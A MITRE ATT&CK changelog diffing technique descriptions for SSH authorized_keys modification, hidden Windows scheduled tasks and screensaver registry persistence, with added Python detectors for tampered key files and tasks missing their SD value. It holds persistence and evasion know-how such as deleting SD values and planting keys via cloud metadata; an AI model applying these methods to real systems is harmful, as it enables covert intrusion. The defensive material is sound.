Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or REST API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm)
Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-25 16:32:23.367000+00:00 | 2022-04-20 16:26:57.982000+00:00 |
| description | Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.
Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse) (Citation: Cybereason Linux Exim Worm) |
Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config.
Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or REST API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm)
Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. |
| external_references[1]['source_name'] | SSH Authorized Keys | Venafi SSH Key Abuse |
| external_references[1]['description'] | ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June 24, 2020. | Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24, 2020. |
| external_references[1]['url'] | https://www.ssh.com/ssh/authorized_keys/ | https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities |
| external_references[2]['source_name'] | Venafi SSH Key Abuse | Google Cloud Privilege Escalation |
| external_references[2]['description'] | Blachman, Y. (2020, April 22). Growing Abuse of SSH Keys: Commodity Malware Campaigns Now Equipped with SSH Capabilities. Retrieved June 24, 2020. | Chris Moberly. (2020, February 12). Tutorial on privilege escalation and post exploitation tactics in Google Cloud Platform environments. Retrieved April 1, 2022. |
| external_references[2]['url'] | https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities | https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/ |
| x_mitre_detection | Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file.
Monitor for changes to and suspicious processes modifying /etc/ssh/sshd_config. |
Use file integrity monitoring to detect changes made to the authorized_keys file for each user on a system. Monitor for suspicious processes modifying the authorized_keys file. In cloud environments, monitor instances for modification of metadata and configurations.
Monitor for changes to and suspicious processes modifying /etc/ssh/sshd_config. |
| x_mitre_version | 1.0 | 1.1 |
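The detection guidance above (integrity monitoring of authorized_keys, watching sshd_config) as a concrete check, added here as an example rather than code from MITRE or the cited sources. It assumes a baseline of expected SHA256 key fingerprints for the account; the authorized_keys and sshd_config contents are constructed, and only the global section of sshd_config (before any Match block) is evaluated.

```python
import base64
import hashlib
import re
from typing import Dict, List, Set

# One entry is "[options] <type> <base64 blob> [comment]"; options may contain quoted
# spaces, so anchor on the key type instead of splitting on whitespace.
KEY_RE = re.compile(
    r"(?P<type>ssh-(?:rsa|dss|ed25519)|ecdsa-sha2-nistp(?:256|384|521)|sk-[\w.@-]+)"
    r"\s+(?P<blob>[A-Za-z0-9+/=]+)(?:\s+(?P<comment>.*))?$")
OPENSSH_DEFAULT_AKF = ".ssh/authorized_keys .ssh/authorized_keys2"

def fingerprint(blob: str) -> str:
    """OpenSSH-style fingerprint: SHA256 of the decoded wire blob, unpadded base64."""
    raw = base64.b64decode(blob, validate=True)
    return "SHA256:" + base64.b64encode(hashlib.sha256(raw).digest()).decode().rstrip("=")

def parse_authorized_keys(text: str) -> List[Dict[str, object]]:
    """Parse each entry; lines that do not parse become {'line': n, 'error': ...}."""
    entries: List[Dict[str, object]] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEY_RE.search(line)
        try:
            fp = fingerprint(m.group("blob")) if m else None
        except ValueError:                      # invalid base64 in the blob
            fp = None
        if m is None or fp is None:
            entries.append({"line": lineno, "error": "unparseable entry"})
            continue
        entries.append({"line": lineno, "type": m.group("type"), "fp": fp,
                        "options": line[:m.start()].strip(),
                        "comment": (m.group("comment") or "").strip()})
    return entries

def audit_authorized_keys(text: str, baseline: Set[str]) -> List[str]:
    """Report keys whose fingerprint is not in the baseline (an added key) and
    entries that do not parse (sshd skips those, but they still merit a look)."""
    findings = []
    for e in parse_authorized_keys(text):
        if "error" in e:
            findings.append(f"line {e['line']}: {e['error']}")
        elif e["fp"] not in baseline:
            findings.append(f"line {e['line']}: {e['type']} key not in baseline {e['fp']} "
                            f"comment={e['comment']!r} options={e['options']!r}")
    return findings

def sshd_directives(text: str) -> Dict[str, str]:
    """Effective global directives: sshd keeps the FIRST value seen for a keyword, and
    'Match' opens conditional blocks, so parsing stops there (global section only)."""
    effective: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)   # "Key value" or "Key=value"
        if parts[0].lower() == "match":
            break
        effective.setdefault(parts[0].lower(), parts[1].strip() if len(parts) > 1 else "")
    return effective

def audit_sshd_config(text: str) -> List[str]:
    """Flag the directives named in the technique text when they look tampered with."""
    d, findings = sshd_directives(text), []
    if "rsaauthentication" in d:
        findings.append(f"RSAAuthentication={d['rsaauthentication']}: legacy SSH-1 directive, review who added it")
    akf = d.get("authorizedkeysfile")
    if akf and akf != OPENSSH_DEFAULT_AKF:
        findings.append(f"AuthorizedKeysFile is non-default ({akf!r}); monitor those paths too")
    return findings

def ssh_blob(key_type: str, pubkey: bytes) -> str:
    """Wire encoding (length-prefixed strings); used only to build the constructed demo keys."""
    def s(b: bytes) -> bytes:
        return len(b).to_bytes(4, "big") + b
    return base64.b64encode(s(key_type.encode()) + s(pubkey)).decode()

# Constructed sample input: one known key, one added key with options, one broken line.
KNOWN_BLOB = ssh_blob("ssh-ed25519", bytes(range(32)))
ADDED_BLOB = ssh_blob("ssh-ed25519", bytes(32))
AUTHORIZED_KEYS = f"""# constructed sample
ssh-ed25519 {KNOWN_BLOB} ops@bastion
command="/usr/bin/true",no-pty ssh-ed25519 {ADDED_BLOB}
ssh-rsa not-base64!! broken
"""
BASELINE = {fingerprint(KNOWN_BLOB)}
SSHD_CONFIG = """# constructed sample
PubkeyAuthentication yes
RSAAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys /etc/ssh/keys/%u
Match User git
    AuthorizedKeysFile /srv/git/keys
"""

if __name__ == "__main__":
    print(*audit_authorized_keys(AUTHORIZED_KEYS, BASELINE), sep="\n")
    print(*audit_sshd_config(SSHD_CONFIG), sep="\n")
```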
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Google Cloud Add Metadata', 'description': 'Google Cloud. (2022, March 31). gcloud compute instances add-metadata. Retrieved April 1, 2022.', 'url': 'https://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata'} | |
| external_references | {'source_name': 'Azure Update Virtual Machines', 'description': 'Microsoft. (n.d.). Virtual Machines - Update. Retrieved April 1, 2022.', 'url': 'https://docs.microsoft.com/en-us/rest/api/compute/virtual-machines/update'} | |
| external_references | {'source_name': 'SSH Authorized Keys', 'description': 'ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June 24, 2020.', 'url': 'https://www.ssh.com/ssh/authorized_keys/'} | |
| x_mitre_contributors | Dror Alon, Palo Alto Networks | |
| x_mitre_contributors | Or Kliger, Palo Alto Networks | |
| x_mitre_platforms | IaaS |
| Old Description | New Description |
|---|---|
Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task. The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel. An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM). |
Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.
The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel.
An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)
Adversaries may also create "hidden" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Andrew Northern, @ex_raritas', 'Bryan Campbell, @bry_campbell', 'Zachary Abzug, @ZackDoesML', 'Selena Larson, @selenalarson', 'Sittikorn Sangrattanapitak'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-12-30 14:26:44.730000+00:00 | 2022-07-06 20:20:13.871000+00:00 |
| description | Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.
The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel.
An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM). |
Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.
The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel.
An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)
Adversaries may also create "hidden" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments) |
| external_references[1]['source_name'] | Twitter Leoloobeek Scheduled Task | SigmaHQ |
| external_references[1]['description'] | Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017. | BlackB0lt. (2022, April 15). https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml. Retrieved June 1, 2022. |
| external_references[1]['url'] | https://twitter.com/leoloobeek/status/939248813465853953 | https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml |
| external_references[2]['source_name'] | TechNet Forum Scheduled Task Operational Setting | ProofPoint Serpent |
| external_references[2]['description'] | Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017. | Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain. Retrieved April 11, 2022. |
| external_references[2]['url'] | https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen | https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain |
| external_references[3]['source_name'] | TechNet Scheduled Task Events | Defending Against Scheduled Task Attacks in Windows Environments |
| external_references[3]['description'] | Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017. | Harshal Tupsamudre. (2022, June 20). Defending Against Scheduled Tasks. Retrieved July 5, 2022. |
| external_references[3]['url'] | https://technet.microsoft.com/library/dd315590.aspx | https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments |
| external_references[4]['source_name'] | Microsoft Scheduled Task Events Win10 | Twitter Leoloobeek Scheduled Task |
| external_references[4]['description'] | Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019. | Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017. |
| external_references[4]['url'] | https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events | https://twitter.com/leoloobeek/status/939248813465853953 |
| external_references[5]['source_name'] | TechNet Autoruns | Tarrask scheduled task |
| external_references[5]['description'] | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. | Microsoft Threat Intelligence Team & Detection and Response Team. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion. Retrieved June 1, 2022. |
| external_references[5]['url'] | https://technet.microsoft.com/en-us/sysinternals/bb963902 | https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/ |
| x_mitre_data_sources[1] | Command: Command Execution | Windows Registry: Windows Registry Key Creation |
| x_mitre_data_sources[2] | File: File Modification | Command: Command Execution |
| x_mitre_version | 1.0 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Microsoft Scheduled Task Events Win10', 'description': 'Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019.', 'url': 'https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events'} | |
| external_references | {'source_name': 'TechNet Scheduled Task Events', 'description': 'Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017.', 'url': 'https://technet.microsoft.com/library/dd315590.aspx'} | |
| external_references | {'source_name': 'TechNet Autoruns', 'description': 'Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.', 'url': 'https://technet.microsoft.com/en-us/sysinternals/bb963902'} | |
| external_references | {'source_name': 'TechNet Forum Scheduled Task Operational Setting', 'description': 'Satyajit321. (2015, November 3). Scheduled Tasks History Retention settings. Retrieved December 12, 2017.', 'url': 'https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen'} | |
| x_mitre_data_sources | File: File Modification |
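An added example (not MITRE's or the cited sources' code) of the cross-check the hidden-task discussion above implies: compare the tasks registered under TaskCache\Tree with what schtasks lists, and flag any entry whose SD value is gone. It assumes leaf keys under Tree are tasks and that TaskName is the first column of `schtasks /query /fo CSV /nh`; the registry snapshot and schtasks output are constructed, and the live collectors run only on Windows.

```python
import csv
import io
import subprocess
from typing import Dict, List, Set

TREE_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree"

# {task path as schtasks prints it: {"Id": guid, "Index": int, "SD": bytes or None}}
TreeSnapshot = Dict[str, Dict[str, object]]


def find_hidden_tasks(tree: TreeSnapshot, visible: Set[str]) -> List[str]:
    """Two checks per registered task: the SD value is gone (the deletion trick), or
    the task is absent from the enumeration tools' view, which also catches the
    Index-metadata variant without needing to know what a 'normal' Index looks like."""
    findings: List[str] = []
    for path, values in sorted(tree.items()):
        if values.get("SD") is None:
            findings.append(f"{path}: SD value missing (Id={values.get('Id')})")
        if path not in visible:
            findings.append(f"{path}: registered in TaskCache\\Tree but not listed by schtasks")
    return findings


def parse_schtasks_csv(output: str) -> Set[str]:
    """Task names from `schtasks /query /fo CSV /nh`; assumption: TaskName is the
    first column. Rows not starting with a backslash are headers or noise."""
    return {row[0] for row in csv.reader(io.StringIO(output)) if row and row[0].startswith("\\")}


def snapshot_tree() -> TreeSnapshot:
    """Windows only: walk TaskCache\\Tree with winreg. Assumption: leaf keys are
    tasks, so an empty folder would also be reported (harmless, but review it)."""
    import winreg
    out: TreeSnapshot = {}

    def walk(key, path: str) -> None:
        nsub, nval, _ = winreg.QueryInfoKey(key)
        if nsub == 0:
            values = {winreg.EnumValue(key, j)[0]: winreg.EnumValue(key, j)[1] for j in range(nval)}
            out[path] = {"Id": values.get("Id"), "Index": values.get("Index"), "SD": values.get("SD")}
            return
        for i in range(nsub):
            name = winreg.EnumKey(key, i)
            with winreg.OpenKey(key, name) as sub:
                walk(sub, path + "\\" + name)

    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, TREE_KEY) as root:
        walk(root, "")
    return out


def visible_tasks() -> Set[str]:
    """Windows only: the task list as schtasks reports it."""
    proc = subprocess.run(["schtasks", "/query", "/fo", "CSV", "/nh"],
                          capture_output=True, text=True, check=True)
    return parse_schtasks_csv(proc.stdout)


# Constructed sample: placeholder GUIDs and a registry view with three tasks, only
# one of which schtasks still lists.
SAMPLE_TREE: TreeSnapshot = {
    r"\Microsoft\Windows\Defrag\ScheduledDefrag":
        {"Id": "{GUID-PLACEHOLDER-1}", "Index": 3, "SD": b"\x01\x00\x04\x80"},
    r"\Updater\WinUpdateCheck":                 # SD value deleted
        {"Id": "{GUID-PLACEHOLDER-2}", "Index": 3, "SD": None},
    r"\Maintenance\Cleanup":                    # metadata altered, SD still present
        {"Id": "{GUID-PLACEHOLDER-3}", "Index": 0, "SD": b"\x01\x00\x04\x80"},
}
SAMPLE_SCHTASKS = '"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","N/A","Ready"\n'

if __name__ == "__main__":
    print(*find_hidden_tasks(SAMPLE_TREE, parse_schtasks_csv(SAMPLE_SCHTASKS)), sep="\n")
```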
| Old Description | New Description |
|---|---|
| Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). | Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Campbell, B. et al. (2022, March 21). Serpent, No Swiping! New Backdoor Targets French Entities with Unique Attack Chain. Retrieved April 11, 2022. |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-557 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 14:36:26.445000+00:00 | 2022-04-14 20:59:52.686000+00:00 |
| description | Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). | Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security) Adversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused task scheduling to potentially mask one-time execution under a trusted system process.(Citation: ProofPoint Serpent) |
| external_references[1]['source_name'] | capec | ProofPoint Serpent |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/557.html | https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain |
| x_mitre_data_sources[0] | File: File Creation | Scheduled Job: Scheduled Job Creation |
| x_mitre_data_sources[2] | Scheduled Job: Scheduled Job Creation | Process: Process Creation |
| x_mitre_data_sources[3] | Command: Command Execution | File: File Modification |
| x_mitre_data_sources[4] | File: File Modification | File: File Creation |
| x_mitre_data_sources[5] | Process: Process Creation | Command: Command Execution |
| x_mitre_version | 2.1 | 2.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/557.html', 'external_id': 'CAPEC-557'} | |
| x_mitre_contributors | Andrew Northern, @ex_raritas | |
| x_mitre_contributors | Bryan Campbell, @bry_campbell | |
| x_mitre_contributors | Zachary Abzug, @ZackDoesML | |
| x_mitre_contributors | Selena Larson, @selenalarson |
| Old Description | New Description |
|---|---|
Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations. The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence: * SCRNSAVE.exe - set to malicious PE path * ScreenSaveActive - set to '1' to enable the screensaver * ScreenSaverIsSecure - set to '0' to not require a password to unlock * ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017) |
Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations.
The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence:
* SCRNSAVE.exe - set to malicious PE path
* ScreenSaveActive - set to '1' to enable the screensaver
* ScreenSaverIsSecure - set to '0' to not require a password to unlock
* ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed
Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.(Citation: ESET Gazer Aug 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-23 12:23:04.955000+00:00 | 2022-04-20 16:58:48.140000+00:00 |
| description | Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations.
The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence:
* SCRNSAVE.exe - set to malicious PE path
* ScreenSaveActive - set to '1' to enable the screensaver
* ScreenSaverIsSecure - set to '0' to not require a password to unlock
* ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed
Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017) |
Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\Windows\System32\, and C:\Windows\sysWOW64\ on 64-bit Windows systems, along with screensavers included with base Windows installations.
The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence:
* SCRNSAVE.exe - set to malicious PE path
* ScreenSaveActive - set to '1' to enable the screensaver
* ScreenSaverIsSecure - set to '0' to not require a password to unlock
* ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed
Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.(Citation: ESET Gazer Aug 2017) |
| external_references[1]['source_name'] | Wikipedia Screensaver | ESET Gazer Aug 2017 |
